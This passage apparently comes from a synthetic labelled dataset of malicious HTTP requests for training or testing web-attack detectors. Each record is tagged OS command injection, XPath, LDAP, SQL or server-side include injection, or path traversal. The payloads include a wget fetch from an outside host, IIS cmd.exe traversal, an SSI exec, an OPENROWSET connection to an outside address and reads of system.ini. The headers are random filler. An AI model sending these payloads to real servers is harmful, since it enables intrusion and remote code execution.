If-Modified-Since: Sat, 17 Mar 07 09:15:05 GMT
If-Unmodified-Since: Sat, 13 Nov 04 22:30:47 CET
If-Match: "FB0w4JLNzi8yt_daz"
If-None-Match: "xKaSlxWZd9grvXilO."
If-Range: "4w6rGW12G0xRWj2X"
Max-Forwards: 2
MIME-Version: 9.8
Pragma: no-cache
Authorization: NTLM bXRyRTE4eHNudW9tc29pRWY5cm9keWVhcFN4bmVpdDN0c0llYWpoMw==
Referer: http://enultd.biz/fs2t/nxztides/iro1brri.swf
Trailer: Date
User-Agent: Mozilla/7.3 (Windows; U; WinNT 7.9; Sc-jT; rv:9.7.7) Gecko/56442514
UA-Disp: 8606,8749,32
UA-OS: Win98
Via: 5.9 www.68nJ.tiff, dTe3c/3.3 www.jtoetw.css:258, FTP/9.1 www.ncOyaoh.shtml
Upgrade: wur/0.7
Warning: 427 www.hawmt.shtml:15983 "urlr86bNwi6airoy" "Thu, 09 Apr 09 13:19:54 CET"
X-Serial-Number: 6732905562
----: ------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 46748
Start - Id: 36793
class: OsCommanding
GET /nrDEm_/eq1X8/eehhdawhArrotg/959rw/ewRtch/rwWDHNp@.wJ.shtml?btsueswji4anl=+ry+h&rlmutD5S8=704438&ynadHOiEs5cqhim=TiiedH6hv%3B&ee=alrWokiw&etheriidtepw=%22++++%3B+%2Fusr%2Fbin%2Fwget+www.riasicnealal.com%2Fna++++%3B&u3=mnIdivi&yERKZz0k=5&eRd2sdj=n%40%3CroAiv&see=rIG-O4 HTTP/1.1
Host: 56.16.151.42
Connection: keep-alive
Accept: audio/*, audio/x-wav;q=0.5
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: rcqifa4s='cHed7'
Client-ip: 90.167.86.81
Cookie: te= 1]tnmgu;neswb=snz;tv7cnspoer4tubn=8925053952
Cookie2: $Version="08"
Date: Wed, 15 Sep 04 13:54:39 UTC
ETag: W/"Q1a5.gAJXtMzm6AntyNu"
Expect: sid9n=eluiuds;m3ishri=rjmr
From: wsCala@r0ragpmo.de
If-Modified-Since: Sat, 07 Feb 09 01:31:47 UTC
If-Unmodified-Since: Fri, 07 May 04 15:41:16 GMT
If-Match: *
If-None-Match: *
If-Range: "4k3HD7n.qUbdpFqx-f"
Max-Forwards: 560
MIME-Version: 1.1
Pragma: reuo5gst='pl'
Proxy-Authorization: Digest nc=1aE81C6d
Authorization: Digest qop=y6Mcma
Range: 907-5,-807
Referer: http://eassd.cz/unc52c/zio5aoxc/Athqqsi/mion8.doc
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: osgibtl (iDf.v91oZ; 4a_FeS9gl)
UA-CPU: PowerPC
UA-Disp: 9579,9287,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 232x1783
Via: 3.2 www.eitw.htm, ess/9.1 www.syhgu.jpg, HTTP/0.1 www.emmjrti.css
Transfer-Encoding: gzip
Upgrade: wfs/7.4
Warning: 136 www.scdehe.htm "ridpNhteTrlcH" 
X-Forwarded-For: 140.59.115.43
X-Serial-Number: 51873709956197
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36793
Start - Id: 48845
class: XPathInjection
GET /sv8znx/HhprmdformzxDeJ/oq2eig/osieo.js?rnhiwm=uejtA%40IgXY&.i3hv=a&sier=7nl%27+or+++6++++%3C+count%28path%2Fchild%3A%3A*%29+++++or+%27aSo3bp%27+%3D%27 HTTP/1.0
Host: 204.42.177.245
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-8-i;q=0.5, x-mac-arabic
Accept-Encoding: compress;q=0.3, identity
Accept-Language: *;q=0.0
Cache-Control: te5xeC='evsxe'
Client-ip: 45.241.92.24
Cookie: ds=154691665;argtekrereru4=lpassthru=r2soesooe
Cookie2: $Version="71"
Date: Wed, 02 Mar 05 14:47:03 UTC
ETag: W/"8E1nvDiVlYEiyT9TELZx"
Expect: iutdtan
From: w2h3rar@tkko9pi.org
If-Modified-Since: Tue, 16 Feb 10 21:17:02 UTC
If-Unmodified-Since: Sun, 15 Mar 09 04:57:12 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 07 Dec 08 12:10:35 GMT
Max-Forwards: 87
MIME-Version: 6.2
Pragma: yt28lanr='yeugo'
Proxy-Authorization: Digest nc=412BEE2D
Authorization: iuut ieiRnfr=Svncz
Range: 5-03627
Referer: /LernsX.jsp
TE: gzip;q=0.8
Trailer: Trailer
User-Agent: Mozilla/5.8 (Windows; U; Win98 0.9; 4r-ta; rv:3.9.4) Gecko/47768954
UA-CPU: StrongARM
UA-Disp: 184,1119,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 412x876
Via: 2.6 27.111.237.6
Transfer-Encoding: deflate
Upgrade: qdiue/5.0
Warning: 266 252.104.26.149 "9bdidtHc" "Thu, 01 Nov 07 22:00:30 GMT"
X-Forwarded-For: 239.247.179.124
X-Serial-Number: 177199337529573688
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48845
Start - Id: 36537
class: OsCommanding
GET /PBServer/..��../..��../..��../winnt/system32/cmd.exe?/c+dir+c:0 HTTP/1.0
Host: 101.245.143.183:80
Connection: ceso3nY
Accept: */*;q=0.4
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.5
Accept-Language: ngss-7C, nraa-Na;q=0.4, nebTkl-ooO;q=0.3, se1nmdFo-tegt;q=0.0
Cache-Control: no-cache
Client-ip: 213.233.54.110
Cookie: els=objectdR/cgc$Tllrdg|include;Ttelnet>;kalpsXEEfa=sjadr1acthn;otcoEf=iCmY
Cookie2: $Version="222"
Date: Tue, 10 Aug 04 02:40:56 CET
ETag: "@ruI.MWKdtelCCfg"
Expect: 9nww
From: rteeiu@new9Eetlcd.org
If-Modified-Since: Wed, 22 Apr 09 20:14:56 UTC
If-Unmodified-Since: Fri, 21 Nov 08 17:48:25 CET
If-Match: "99DCnEFU1GYMcD9k"
If-None-Match: "HWXspFdFV_utEpAEBu"
If-Range: *
Max-Forwards: 2
MIME-Version: 3.0
Pragma: arhDa=trSgse
Proxy-Authorization: Basic MnNlMG9hb1U6endvb2N0cW8=
Authorization: Digest cnonce="ZGoncb"
Range: 9206-,968-
Referer: /t5eoiat/crX7lzH/eyi0te/atir/ohamtnre.asp
TE: trailers,deflate,trailers
Trailer: Via
User-Agent: ftuap (aMegu@Tv)
UA-CPU: x86
UA-Disp: 0316,285,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 547x5195
Via: 1.7 184.212.133.237
Transfer-Encoding: compress
Upgrade: ildtt/8.0
Warning: 375 www.gfsleIzg.jpg:66 "hjNhnn62m" 
X-Forwarded-For: 149.92.182.203
X-Serial-Number: 55534835625911216707
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36537
Start - Id: 43874
class: OsCommanding
GET /cgi-local/alibaba.pl|dir ..\\..\\..\\..\\..\\..\\..\\,? HTTP/1.0
Host: 145.226.122.193
Connection: close
Accept: */*
Accept-Charset: x-mac-hebrew, iso-8859-7;q=0.1, iso-8859-15, big5
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 132.134.82.134
Cookie: fihMateayhssdt=939
Cookie2: $Version="4"
Date: Mon, 30 Jul 07 05:27:31 GMT
ETag: "4p2ZiLBnvJxcMOdpmaxa"
Expect: 100-continue
From: 2bgyahe@ty1w.biz
If-Modified-Since: Sun, 29 Feb 04 24:28:01 CET
If-Unmodified-Since: Sun, 19 Nov 06 03:05:46 CET
If-Match: "t-nu44CIJ9zpgSAjN0t"
If-None-Match: "o80Br3oYw_Toit0ij@"
If-Range: Sun, 07 Aug 05 24:59:34 CET
Max-Forwards: 8
MIME-Version: 1.9
Pragma: fAttmFml='s4a'
Proxy-Authorization: Digest uri=/uiers/ieatYM/iCiR.tiff
Authorization: lSOune xeikcnEt=6xsrh
Range: 17-,-8
Referer: /sgieee/mnet/o3occi/thgchae.cgi
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/2.6 (X11; U; Unix 6.9; Tr-e9; rv:7.7.5) Gecko/38970477
UA-CPU: Sparc
UA-Disp: 7852,060,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 629x1097
Via: FTP/1.6 238.1.243.165, 9.9 185.157.151.121
Transfer-Encoding: 1qsm; vrjcoda9=adoeErc7
Upgrade: 0a7on5/8.8, emazee/1.9, 1hodgr/0.0, auiinp/3.7
Warning: 631 234.108.10.201:870 "l05cl4bnf" "Sat, 24 Jan 04 23:46:55 UTC"
X-Forwarded-For: 160.49.9.9
X-Serial-Number: 3781444141
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43874
Start - Id: 49762
class: XPathInjection
GET /x5ULi-.3_e/h3K8SlMNZSpaoAEP.html?g26t=rntm%27%5D+%7C++P+%7C++%2F%2Fuser%5B++++name%2Ftext%28++%29++++%3D++%27dop&Roaeeab=584 HTTP/1.0
Host: 196.161.34.119
Connection: close
Accept: text/html, video/*, text/plain
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=9630
Client-ip: 253.1.218.202
Cookie: yOYecho03=jt;g9f=32;tn=hZcams
Cookie2: $Version="367"
Date: Sat, 06 Dec 08 09:25:51 CET
ETag: W/"gejDXjnrS6tpYzTu_6xQ"
Expect: 6itn=bdoaua
From: 1ni9pe@Genwbli.net
If-Modified-Since: Sat, 23 Jun 07 08:01:21 CET
If-Unmodified-Since: Sat, 12 May 07 13:44:21 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM ZXNScWFmc2VueXpMc3Vlb255ZXNudWVhc2JlZXU1clRzaUhlY2lk
Range: 186464-,-8
Referer: /eynl/irtao/roLnt/rhdse.txt
TE: chunked,chunked
Trailer: Referer
User-Agent: en2oRA (tND11OZaNo; hC2m69; nrnUR2; uqiprD_)
UA-CPU: Sparc
UA-Disp: 7451,3171,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3095x7377
Via: tfyr/4.6 www.jCtaf.js, 0.4 www.zdjlrdQm.png
Transfer-Encoding: identity
Upgrade: pksat/0.9, it6/4.7, Atv/0.3, zos/6.7, aoE/5.6
Warning: 925 www.tgat.css "onzuY" 
X-Forwarded-For: 246.149.155.68
X-Serial-Number: 9273829516846529
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49762
Start - Id: 37520
class: LdapInjection
PUT /tdMeYlni9cad9tenp2b/m0b/hWTcn18-oMlHm/aUorPsBF/tror/oIpds90Is3gtim/JG3l.5xXZ/1qyIp4tM_ZP-C/njYkpT0xQPT/tf/6iooWiejtPr/glnto0W9r.php? HTTP/1.1
Content-Length: 263
Content-Language: Ja
Content-Encoding: identity
Content-Location: http://4rMNi5.cz/eutsm/3ir7tT/rrdnld8t.jsp
Content-MD5: OXQxY3RlYWxjZEFrc3Jobg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 31 May 09 08:08:37 CET
Last-Modified: Fri, 20 Apr 07 20:09:18 CET
Host: 148.197.192.212
Connection: close
Accept: */*;q=0.0
Accept-Charset: ks_c_5601-1987, euc-tw;q=0.9, euc-cn;q=0.4, windows-1258
Accept-Encoding: gzip, gzip;q=0.8, gzip;q=0.6, compress;q=0.8
Accept-Language: *;q=0.4
Cache-Control: min-fresh=060
Client-ip: 244.64.43.249
Cookie: N84dnnhthangB=73405;pafaPeIrpau=ead;oiEho4ete=4095106;hniAdP1oeu=eFfin5l;oTar=hf
Cookie2: $Version="192"
Date: Mon, 07 Apr 08 18:06:15 GMT
ETag: "u34qWBiJNpxKq9A"
Expect: 100-continue
From: tisu@inUeyeh.org
If-Modified-Since: Sun, 20 Nov 05 13:45:31 GMT
If-Unmodified-Since: Tue, 05 Dec 06 13:53:45 CET
If-Match: "cwXPK.00F4rWBLp"
If-None-Match: "cQz-Fch762z5wWVa"
If-Range: *
Max-Forwards: 846
MIME-Version: 0.6
Pragma: rU='6tge'
Proxy-Authorization: NTLM NWkxZXN3eXNodGFpb25zTnJnbG5UZTdyaEVhd3Jhc3lyeWVJ
Authorization: Basic bHI4djoxYmJyYQ==
Range: 0516-7855,069180-,334-
Referer: http://Ea50.net/riBts/hpznhatf/Latos6ao/Peerw/iixne.asmx
TE: gzip;q=0.5,deflate;q=0.1,trailers
Trailer: Connection
User-Agent: Mozilla/2.4 (X11; U; Linux i586 3.3; an-bt; rv:1.8.4) Gecko/69408261
UA-CPU: MIPS
UA-Color: color32
UA-Pixels: 2665x9772
Via: 6.4 95.218.183.57, 9.7 104.205.119.33:0
Transfer-Encoding: gzip
Upgrade: c0e/0.5, ndgd/9.1
Warning: 123 www.sswne9.png "xiaoxtnnd9tipju" 
X-Serial-Number: 4606842395290054569
----: ----------------
~~~~~: ~~~~~~~~~~~~

Olunionftpq=680)(&(objectClass=Mlti)(|(sn = aN)(cn=7e  J*))&cheOLt0as=s7ataIpsavtdA&ileaeoLe9sogwnw=2721&xti=edt&sE=X2aslhs7n8laeeI4it&lr=i&jussao8=5ncet&rmfss=5184&lyj=nnear@ausrpu dloxh&eser=ta&ansn3malidinepl=ths&s7hsa=siayhE\

End - Id: 37520
Start - Id: 36209
class: PathTransversal
GET /.nsf/../notes.ini? HTTP/1.0
Host: www.i3eZaoagpy.it
Connection: lemtem
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: identity, compress;q=0.0
Accept-Language: hf-iia;q=0.9, th2fme-5roenO;q=0.7, sture-ew6c4R;q=0.8, s3nlTaqr-udor
Cache-Control: min-fresh=8232
Client-ip: 189.4.113.141
Cookie: 5vnctuyePlsnp=NraTx;Il7lesenS=rwonavr;e5b2fmiwemt=sxt\hSw 'Rnehno~n;nfTrom8ahtD=oflal8hShcxt;5x=3adepiIpl;imhbJetye6i4oE=26403
Cookie2: $Version="3"
Date: Mon, 28 May 07 17:08:33 UTC
ETag: "nUChde-_vcAzv_v"
Expect: ctcvplr
From: aesn@tdnix0ah2.ch
If-Modified-Since: Sat, 21 Feb 09 21:33:58 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 14 Jun 05 13:22:36 GMT
Max-Forwards: 92
MIME-Version: 3.7
Pragma: no-cache
Authorization: Basic ZGhvbjpuZHRmcno=
Range: 183-
Referer: http://meerLs2.gov/aailss/zEBrcfi.mp3
TE: trailers,trailers,gzip
Trailer: Accept-Language
User-Agent: Mozilla/4.0 (Windows; U; Windows NT 3.2; sa-ir; rv:1.9.8) Gecko/73289828
Via: 1.0 17.170.148.192, FTP/9.6 194.58.7.58
Upgrade: sst2oo/6.7, eatt/1.0
X-Serial-Number: 003494109

null

End - Id: 36209
Start - Id: 43413
class: OsCommanding
GET /ncepereg6smlhr0Uay/tV@OXTCxz7Wu/emgzhse.asp?yerkcmo=6&6V17M=%2BiS&reh4iusI1rio=mail++cSwv%40tfiylt.nusoote.gov++%3C%3C+++++%2Ftmp%2Fwu.c%3B&os9ad2w=7666666&icrrre=027&mirr42doteot9=ixbt7Osonidsu&tP8td=byO1i&erBstylehyAaj2=1283903&nsam=fxu&2na6trsd2rruspy=tZxh&ncnzizxaiibvo=chR&hncdrseo=wiee HTTP/1.1
Host: 108.247.171.64
Connection: eynqniu
Accept: application/zip;q=0.9
Accept-Charset: *
Accept-Encoding: compress;q=0.3, deflate;q=0.9, compress;q=0.9, gzip;q=0.0
Accept-Language: 5miv6aun-y, hhS7-o8ch5;q=0.0
Cache-Control: max-stale=57
Client-ip: 5.203.243.165
Cookie: rmso=ndoectrsnih;nasd=9omoousar5on;iedpchemhiasT=047973341;5rdcsaw4=zp
Cookie2: $Version="4"
Date: Sat, 06 Feb 10 15:50:26 CET
ETag: "jIrF8GB@jiqHJsgpERvI"
Expect: 100-continue
From: fikl0E@tRser.fr
If-Modified-Since: Thu, 18 Mar 04 21:47:54 UTC
If-Unmodified-Since: Mon, 05 Nov 07 04:04:25 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 4.8
Pragma: nronts5=bvrhsdH
Proxy-Authorization: NTLM RDdvbGF0YXBoaGNvaTFyYW5kZWRSc3NtSnMyc2luaHRNc2doZWVtZmE5ZTk=
Authorization: Digest qop=auth
Range: 6-,47-768842,6146-09
Referer: http://lsqa.be/l2gar40w.jpeg
TE: trailers,gzip
Trailer: Expect
User-Agent: Mozilla/0.3 (compatible; Konqueror/9.2; Linux i586; Ameidttnhr)
UA-CPU: 68000
UA-Disp: 2710,0982,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 319x516
Via: 2.6 www.iaE7Tao.css, 6.9 144.211.17.34, HTTP/2.0 138.161.184.6
Transfer-Encoding: identity
Upgrade: zos/3.8, LrxEi/5.1
Warning: 667 www.eekudeq.shtml "ep6tpihnare" 
X-Forwarded-For: 193.68.229.100
X-Serial-Number: 64752723331418038
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43413
Start - Id: 39109
class: LdapInjection
POST /irSr5nvOcgsfdn.html? HTTP/1.0
Content-Length: 175
Content-Language: efV,bomZ4r
Content-Encoding: identity
Content-Location: /enEdnr/seiS.txt
Content-MD5: YjlrdG43ZDQ2cmVlZ2xldA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 22 Sep 05 23:20:39 UTC
Last-Modified: Wed, 19 Apr 06 01:54:47 UTC
Host: www.iijnts.ch
Connection: hRob5ib
Accept: image/*;q=0.6, application/*;q=0.5
Accept-Charset: x-mac-icelandic, euc-tw;q=0.5, iso-8859-5, iso-8859-8-i;q=0.1
Accept-Encoding: *;q=0.7
Accept-Language: mrh-vlsoesi;q=0.5, epir-eTerTaoa
Cache-Control: min-fresh=596
Client-ip: 112.218.49.24
Cookie: EHVtscriptwp-KTImML=2436696;hrr3gNepet=8770143;UO3Z=)(    | (displayName=had*)    (name    =    had*  )(   mail=had* )
Cookie2: $Version="899"
Date: Sat, 17 Jan 04 19:24:55 GMT
ETag: W/"EDp2SaBaF8CHZTkiBLFB"
Expect: 100-continue
From: raspuv@ntperaoi0.com
If-Modified-Since: Sat, 30 Jan 10 09:11:01 GMT
If-Unmodified-Since: Fri, 03 Apr 09 20:38:30 UTC
If-Match: *
If-None-Match: "@K.T_KU2UZXMaAE0"
If-Range: Fri, 14 Nov 08 18:46:02 GMT
Max-Forwards: 3
MIME-Version: 4.0
Pragma: no-cache
Authorization: NTLM ZW9obHJob2R4ZTRNRXdudGxDZnM2Q2VhZ0VwZk1kb203aUVzZQ==
Range: 436794-224,783-23111,-50
Referer: /u4o4coen/elte.php3
TE: trailers,trailers
Trailer: If-Match
User-Agent: 2om0gts4teaRci
UA-CPU: StrongARM
UA-Disp: 560,8343,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 7309x3114
Via: 8.2 208.104.216.93, FTP/1.7 www.eqtzsh.jpg
Transfer-Encoding: identity
Upgrade: lbe/6.4, zcih6/7.6, esl7m/3.8, 3neS/7.1
Warning: 090 www.daarr.html "tlodnt" 
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

8.gh=abinclude&pooCvk=20m0&6B5t1K=ns1pf5scecau&wpge4ogA0tnt=mpoahtihce1&33Mv-r=iLJosF&ei=Wnhti&4eS0s=5793&aME2jlt=8phmQEpwv p~et&zc=eMevaCAy@k&tstwnoi2=etxmltii&ohznu=0836

End - Id: 39109
Start - Id: 40047
class: SSI
GET /e2g.png?gytr=sw1l%25+uZD5ecnlahy&DeitcnrRrena8Kl=li&J_m5Rw=ShAsean3hyGanK&-ovjcHF8H6S_=nn3tAal-ewd%403sl&ade=dnst&reOijesdats=Unosseawrcu&vrasthrThn=2193&uj=yandTdu&7sxjvi=32&aaojsnel15absyi=05303271&adSdygusJ=naL&riia=%3C%21--+++%23exec+++++cmd%3D%22%2Fbin%2Fls+-l+++++%2Fhome%2F9elta%2FryDoe6%22++--%3E&andTZwhereP@js=6nnhpvpntlend&gist=cJ6YtSDJ HTTP/1.0
Host: 4.188.247.113
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: wrgsdfn=1abzhh5o
Client-ip: 80.3.170.218
Cookie: cttteinnii=u710c/mhtLt;edxttelwNgNeds=138;BVntuQOall3BJ=ekwsl4whl;aO=/m=sed]passwd awR1t9q=
Cookie2: $Version="6"
Date: Mon, 11 Dec 06 20:01:48 GMT
ETag: W/"ic.KMilZjcECyW@B"
Expect: 100-continue
From: crdluua@zohe.com
If-Modified-Since: Sat, 04 Dec 04 23:30:52 GMT
If-Unmodified-Since: Sat, 25 Mar 06 01:29:39 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Basic b3Rvd046bE5vZGh4bA==
Authorization: Digest response="d4acc16FbFb28fC2120C46A686819ff0"
Range: 92956-
Referer: http://lt7e.de/etetet/tottmrEh/0Hawrim/rCttmob/gzhc9ej.exe
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/6.2 (compatible; Konqueror/1.9; Linux i386; lkcns; omNnzcinic; 6lean4)
UA-CPU: MIPS
UA-Disp: 490,576,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 4665x776
Via: munr/7.3 161.214.68.211
Transfer-Encoding: NsshIt; mange=rffre
Upgrade: Reeanu/6.7, rten/3.6, tdg/3.6
Warning: 794 212.70.161.46 "nC7teHarp0di5fna" 
X-Forwarded-For: 199.217.167.247
X-Serial-Number: 02001
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40047
Start - Id: 42589
class: SqlInjection
GET /eiu13tgetasssls/CgSjhtacceszN/isas.css?maahd1en=%3B++++select++++*+++from+OPENROWSET%28++%27SQLoledb%27%2C%27uid%3DtdZbZa0ne%3Bpwd%3DiOwehw%3BNetwork%3DDBMSSOCN%3BAddress%3D219.75.240.98%2C62729%3B%27%2C%27select++*+++++from++eo%27+++%29&HmTk7=3tmp&sm=atcecGshf&itRnspew7suodml=293139605&sedD=121432 HTTP/1.1
Host: 123.120.133.196:80
Connection: close
Accept: application/*, image/png, text/*
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: sNe=5umut
Client-ip: 218.19.16.82
Cookie: 8yowoeecbsthm=tV9frie;eiebnaaiubdhu=5;stu2saeqaeko=9235
Cookie2: $Version="502"
Date: Fri, 26 Jan 07 18:08:52 GMT
ETag: W/"mZwqS5u@zel3eQqIe8"
Expect: wshtlUla
From: tmTstilr@oerx.it
If-Modified-Since: Mon, 29 Jan 07 18:12:32 GMT
If-Unmodified-Since: Wed, 24 Oct 07 16:56:11 CET
If-Match: "ZTP9j4FICpefnmRQe"
If-None-Match: "@ydKyN3ohPDqZvu."
If-Range: ".i0RC-BNWzZKkalv"
Max-Forwards: 4
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Basic Y2llZ2U6bml0aWQ=
Authorization: psltct chiern=saaa
Range: 5-,-2176,0697-71705
Referer: http://etelud.fr/ahzaT9fo/eetitlr/bheahodu/dacpLbdj/waeeoeh.bin
TE: chunked
Trailer: From
User-Agent: Mozilla/0.6 (Machintosh; U; Mac OS X 2.4; ha-ab; rv:2.9.1) Gecko/85176884
UA-CPU: MIPS
UA-Disp: 8242,0192,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 4922x3138
Via: HTTP/0.8 www.aed2Nnsl.jpg, 5.2 152.201.56.54
Transfer-Encoding: compress
Upgrade: usha/3.8, pbmz/6.8, Mhisf/9.8, cAir/5.6
Warning: 624 226.11.216.12:21651 "base2a5yw9vFoeoe" "Wed, 13 Sep 06 03:02:24 GMT"
X-Forwarded-For: 149.227.177.29
X-Serial-Number: 7047593
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42589
Start - Id: 35801
class: XPathInjection
GET /aIj5OHXfBg0IOTlzqjMo/oZWtL0mIlorZscripts/optSPFhttpsacceptB8orvcwS/dhhat/yretll8eFzisoy/rp9cP_Q-hrEZ4rl.php?Bswheresock_stream=ztmN%27++++or+++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++or+%2782%27++%3D++++%27 HTTP/1.0
Host: www.ptTxelhteu.de:80
Connection: heeMh
Accept: audio/x-wav, application/rtf, audio/x-wav
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 136.152.12.105
Cookie: Kx5qtelnetHGD=dnte
Cookie2: $Version="6"
Date: Mon, 11 Jan 10 09:06:27 CET
ETag: W/".LkKw7IuwRwvfgL-"
Expect: 37tora
From: gH0ez@Sireoah.fr
If-Modified-Since: Fri, 18 Feb 05 06:02:57 GMT
If-Unmodified-Since: Sun, 03 Jun 07 08:15:19 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7375
MIME-Version: 7.5
Pragma: io3mm3dt='Urr'
Proxy-Authorization: luLc Okt8e=3llo
Authorization: Digest opaque="rt7ngt"
Referer: /p6oair0p/clscy/att1iRei/mtuxwlfg/lgboenh.cfm
TE: trailers,trailers
Trailer: Expect
User-Agent: at4o3eU8 http://www.mpdcev.gov
UA-CPU: x86
UA-OS: WinNT
UA-Pixels: 4135x5853
Via: 0.7 97.3.176.16
Transfer-Encoding: identity
Upgrade: tmle/3.8
Warning: 463 52.135.104.34 "le3vso" 
X-Forwarded-For: 240.46.36.222
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35801
Start - Id: 36106
class: PathTransversal
GET /4dlMvz/snaetie4irhaleggjVq/iJ.k8rwYAFr7v/slMdCf3Cu9LIA/aRdd7As7/aor4pns9sosofoatdec5.nsf?srorehse=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&yzrlridsre=oLuLLH1N7rBV&yn=i-EGDhzcE HTTP/1.1
Host: www.gbit.uk
Connection: close
Accept: image/*;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 100.85.62.104
Cookie: eeEeara=wllesi7;dl23tdq=OwhndaajtmMtl2;acrc=Adt
Cookie2: $Version="1"
Date: Thu, 18 Feb 10 21:30:04 CET
ETag: W/"END-QoI4eA7dNp1b9"
Expect: 100-continue
From: 7Croe@kumvreNv.biz
If-Modified-Since: Fri, 09 Jan 09 15:58:38 GMT
If-Unmodified-Since: Sun, 07 Aug 05 21:08:47 UTC
If-Match: *
If-None-Match: "xMeZS7p4aSgodpK58sc_"
If-Range: Fri, 10 Jun 05 24:15:09 GMT
Max-Forwards: 5
MIME-Version: 4.7
Pragma: s4s=ip
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: AaaWvE cyatu3=ye8s5hk
Range: 78-
Referer: http://www.Dmtalt.biz/lg9n/S6im/aoqyoa/ordsel/Niddfvoc.php3
TE: gzip;q=0.6,gzip;q=0.8,deflate
Trailer: Referer
User-Agent: SteeEKin
UA-CPU: Sparc
UA-Disp: 9693,338,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 8256x1298
Via: HTTP/9.1 217.127.213.46, HTTP/5.1 35.43.162.99
Transfer-Encoding: deflate
Upgrade: 9tr9iu/0.9
Warning: 505 www.e3nDj.jpeg:48661 "atsjlrarlaaa" 
X-Forwarded-For: 77.201.61.163
X-Serial-Number: 5507795373725385751
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36106
Start - Id: 45469
class: PathTransversal
GET /yf34z1NB9D1XGcU79w.cfm?riyuetepso=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&bit5hy=698577172&IzsToawe=qrpasswds&_KYYsA1-An=8492401&unadoSbeen=425880&lmeergosa9p=aa4pbd3ey6e&phpTetc@log_=samei&hnee1=sn0au1ooUnare&resxE=ujkm.GLNK HTTP/1.0
Host: www.epolwnh.com
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-4, iso-8859-8-i, iso-2022-jp;q=0.0, windows-1255;q=0.3, windows-1251
Accept-Encoding: *;q=0.6
Accept-Language: mstl-eXsees;q=0.0, odeM-tPTs3r;q=0.4, wMnqe-tthXx;q=0.5
Cache-Control: only-if-cached
Client-ip: 60.160.46.41
Cookie: hFfinsert=6513;8eedpe=68381;AbsgpLpe=wIp5whwWientstdingf;5sean4eum2o=06;n9WdOHRr8=40775
Cookie2: $Version="428"
Date: Mon, 11 Jan 10 12:21:12 GMT
ETag: "Omu@QDU3nzKwBGlFA0"
Expect: tsgnr=xneob;kaoe=dnfiebmk
From: 9lho@aiRe.net
If-Modified-Since: Sat, 17 May 08 16:21:34 GMT
If-Unmodified-Since: Wed, 13 Apr 05 11:02:18 UTC
If-Match: *
If-None-Match: "5yLmK20fyd55FHb"
If-Range: Sat, 28 Nov 09 22:18:21 GMT
Max-Forwards: 4988
MIME-Version: 2.1
Pragma: no-cache
